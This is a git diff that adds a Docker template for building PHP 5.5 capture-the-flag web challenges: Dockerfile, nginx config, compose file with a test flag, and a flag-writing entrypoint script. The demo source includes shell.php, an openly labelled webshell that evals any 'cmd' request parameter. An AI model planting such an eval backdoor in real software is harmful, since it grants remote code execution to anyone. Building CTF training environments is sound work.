diff --git a/web-nginx-php55/Dockerfile b/web-nginx-php55/Dockerfile new file mode 100644 index 0000000..5d27487 --- /dev/null +++ b/web-nginx-php55/Dockerfile @@ -0,0 +1,32 @@ +FROM php:5.5-fpm-alpine + +# 制作者信息 +LABEL auther_template="CTF-Archives" + +# 安装必要的软件包 +RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories &&\ + apk add --update --no-cache nginx bash + +# 拷贝容器入口点脚本 +COPY ./service/docker-entrypoint.sh /docker-entrypoint.sh +RUN chmod +x /docker-entrypoint.sh + +# 复制nginx配置文件 +COPY ./config/nginx.conf /etc/nginx/nginx.conf + +# 复制web项目源码 +COPY src /var/www/html + +# 重新设置源码路径的用户所有权 +RUN chown -R www-data:www-data /var/www/html + +# 设置shell的工作目录 +WORKDIR /var/www/html + +EXPOSE 80 + +# 设置nginx日志保存目录 +VOLUME ["/var/log/nginx"] + +# 设置容器入口点 +ENTRYPOINT [ "/docker-entrypoint.sh" ] \ No newline at end of file diff --git a/web-nginx-php55/README.md b/web-nginx-php55/README.md new file mode 100644 index 0000000..35c259f --- /dev/null +++ b/web-nginx-php55/README.md @@ -0,0 +1,30 @@ +# web-nginx-php55 + +部分容器逻辑参考自:[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73),在此感谢 [陌竹 - mozhu1024](https://github.com/mozhu1024) 师傅做出的贡献 + +## 环境说明 + +提供 `Nginx` +`PHP 5.5.38` 的基础环境,默认暴露端口位于 80 + +> 请注意 !!! +> +> 需要注意的是,模板默认会将 flag 保存在 /flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 + +## 如何使用 + +直接将 PHP 项目放入 `./src` 目录即可 + +源码放置进 `./src` 目录之后,执行 + +```shell +docker build . +``` + +即可开始编译镜像 + +也可以在安放好相关项目文件之后,直接使用 `./docker/docker-compose.yml` 内的 `docker-compose` 文件实现一键启动测试容器 + +```shell +cd ./docker +docker-compose up -d +``` diff --git a/web-nginx-php55/config/nginx.conf b/web-nginx-php55/config/nginx.conf new file mode 100644 index 0000000..553b298 --- /dev/null +++ b/web-nginx-php55/config/nginx.conf @@ -0,0 +1,34 @@ +# daemon off; + +worker_processes auto; + +events { + worker_connections 1024; +} + +http { + include /etc/nginx/mime.types; + default_type application/octet-stream; + sendfile on; + keepalive_timeout 65; + + server { + listen 80; + server_name localhost; + root /var/www/html; + index index.php index.html index.htm; + + location / { + try_files $uri $uri/ /index.php?$args; + } + + location ~ \.php$ { + try_files $uri =404; + fastcgi_pass 127.0.0.1:9000; + fastcgi_index index.php; + include fastcgi_params; + fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; + } + + } +} \ No newline at end of file diff --git a/web-nginx-php55/docker/docker-compose.yaml b/web-nginx-php55/docker/docker-compose.yaml new file mode 100644 index 0000000..1833512 --- /dev/null +++ b/web-nginx-php55/docker/docker-compose.yaml @@ -0,0 +1,11 @@ +version: '3' +services: + test: + build: ../ + environment: + # 仅为测试用flag + GZCTF_FLAG: "flag{a63b4d37-7681-4850-b6a7-0d7109febb19}" + ports: + # 设置了暴露端口 + - 8080:80 + restart: unless-stopped diff --git a/web-nginx-php55/service/docker-entrypoint.sh b/web-nginx-php55/service/docker-entrypoint.sh new file mode 100644 index 0000000..cf51fac --- /dev/null +++ b/web-nginx-php55/service/docker-entrypoint.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +rm -f /docker-entrypoint.sh + +# Configure Nginx +mkdir mkdir /run/nginx +touch /run/nginx/nginx.pid + +# Get the user +user=$(ls /home) + +# Check the environment variables for the flag and assign to INSERT_FLAG +# 需要注意,以下语句会将FLAG相关传递变量进行覆盖,如果需要,请注意修改相关操作 +if [ "$DASFLAG" ]; then + INSERT_FLAG="$DASFLAG" + export DASFLAG=no_FLAG + DASFLAG=no_FLAG +elif [ "$FLAG" ]; then + INSERT_FLAG="$FLAG" + export FLAG=no_FLAG + FLAG=no_FLAG +elif [ "$GZCTF_FLAG" ]; then + INSERT_FLAG="$GZCTF_FLAG" + export GZCTF_FLAG=no_FLAG + GZCTF_FLAG=no_FLAG +else + INSERT_FLAG="flag{TEST_Dynamic_FLAG}" +fi + +# 将FLAG写入文件 请根据需要修改 +echo $INSERT_FLAG | tee /flag + +chmod 744 /flag + +php-fpm & nginx & + +echo "Running..." + +tail -F /var/log/nginx/access.log /var/log/nginx/error.log \ No newline at end of file diff --git a/web-nginx-php55/src/flag.php b/web-nginx-php55/src/flag.php new file mode 100644 index 0000000..8865a6e --- /dev/null +++ b/web-nginx-php55/src/flag.php @@ -0,0 +1,9 @@ + + + ____ _____ _____ _ _ _ + / ___|_ _| ___| / \ _ __ ___| |__ (_)_ _____ ___ + | | | | | |_ _____ / _ \ | '__/ __| '_ \| \ \ / / _ \/ __| + | |___ | | | _|_____/ ___ \| | | (__| | | | |\ V / __/\__ \ + \____| |_| |_| /_/ \_\_| \___|_| |_|_| \_/ \___||___/ + + + + +

Webshell is in /shell.php ,Key is "cmd"

+

flag is in /flag.php

diff --git a/web-nginx-php55/src/shell.php b/web-nginx-php55/src/shell.php new file mode 100644 index 0000000..d6cb477 --- /dev/null +++ b/web-nginx-php55/src/shell.php @@ -0,0 +1,14 @@ +"; + $cmd = ($_REQUEST['cmd']); + @eval($cmd); + echo ""; + die; +} +else{ + show_source(__FILE__); + phpinfo(); +} + +?> \ No newline at end of file diff --git a/web-nginx-php73/README.md b/web-nginx-php73/README.md index e2ac340..74d8aed 100644 --- a/web-nginx-php73/README.md +++ b/web-nginx-php73/README.md @@ -8,7 +8,7 @@ > 请注意 !!! > -> 需要注意的是,模板默认会将 flag 保存在 / flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 +> 需要注意的是,模板默认会将 flag 保存在 /flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 ## 如何使用